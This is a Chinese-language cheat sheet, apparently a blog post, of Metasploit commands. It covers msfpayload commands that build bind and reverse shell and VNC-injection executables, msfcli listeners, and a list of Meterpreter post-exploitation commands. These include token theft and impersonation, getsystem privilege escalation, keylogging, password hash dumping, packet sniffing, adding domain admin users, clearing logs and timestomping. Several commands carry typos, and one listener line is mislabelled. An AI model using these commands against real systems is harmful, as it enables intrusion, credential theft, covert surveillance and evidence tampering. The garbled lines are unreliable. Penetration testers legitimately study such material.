MsfPayloads&Meterpreter commands

Ps: more for <METASPLOIT UNLEASHED>

 

 

 

0×01 MsfPayloads

 

1.在目标绑定端口的监听Shell

 

./msfpayload windows/shell_bind_tcp LPORT=4444 X > open_shell_on_port.exe

 

用nc直接连接端口

 

2.反连Shell

 

./msfpayload windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx X > reverse-shell.exe

 

本地监听

 

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx E

 

3.通过VNC协议绑定端口的Shell

 

./msfpayload windows/vncinject/bind_tcp LPORT=4444 X > listen-vnc.exe

 

本地监听

 

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=4444 RHOST=xxx.xxx.xxx.xxx DisableCourtesyShell=TRUE E

 

4.反连VNC会话的Shell

 

./msfpayload windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 X > /tmp/reverse-vnc.exe

 

本地监听

 

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E

 

5.Meterpreter的绑定端口Shell

 

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E

 

远程连接

 

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E

 

6.Meterpreter的反连Shell

 

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E

 

本地监听

 

./msfcli exploit/multi/handler PAYLOAD=windowsmeterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E

 

 

 

0×02 Meterpreter

 

help:

 

帮助

 

run script:

 

运行一些脚本,比如 get_local_subnets

 

sysinfo:

 

显示系统信息

 

ls:

 

列目录

 

use priv:

 

载入权限扩展

 

ps:

 

列进程

 

migrate PID:

 

迁移到指定进程

 

use incognito:

 

载入隐藏函数. (用于模拟上一个机器的Token.我也没太明白这个功能？)

 

list_tokens –u:

 

列出有效用户Token

 

list_touken –g:

 

列出有效用户组Token

 

impersonate_token DOMAIN_NAME\\USERNAME:

 

模拟域用户Token

 

steal_token PID:

 

偷取有效Token给进程

 

drop_token:

 

降权

 

getsystem:

 

尝试通过多重手段自动提权

 

shell:

 

开启一个交互的shell

 

execute –f cmd.exe –i

 

激活cmd.exe并与之交互

 

execute –f cmd.exe –i –t

 

用所有有效Token执行cmd.exe

 

rev2selft:

 

恢复到原始用户权限

 

reg command:

 

操作注册表,create,delete,query,set

 

setdesktop number:

 

选择当前用户桌面

 

screenshot:

 

给目标截图

 

upload file:

 

上传文件

 

download file:

 

下载文件

 

keyscan_start:

 

开启键盘记录

 

keyscan_dump:

 

查看键盘记录内容

 

keyscan_stop:

 

停止键盘记录

 

getprivs:

 

尝试取得可能的权限

 

uictl enable keyboard/mouse:

 

操控鼠标/键盘

 

background:

 

后台运行Meterpreter

 

hashdump:

 

抓哈希

 

use sniffer:

 

载入嗅探模块

 

sniffer_interfaces:

 

列出所有可嗅探的网卡

 

sniffer_dump interfaceID pcapname:

 

设定在哪张网卡嗅探并保存pcap包

 

sniferr_start:

 

开始嗅探

 

sniffer_start interfaceID packet-buffer:

 

设定缓冲并在指定接口上嗅探

 

sniffer_stats interfaceID:

 

取得接口的相关信息

 

sniffer_stop interfaceID:

 

停止嗅探

 

add_user:

 

添加用户

 

add_group_user "Domain Admins":

 

添加域管用户

 

clearv:

 

干掉日志

 

timestomp:

 

改变文件属性(时间)

 

reboot:

 

重启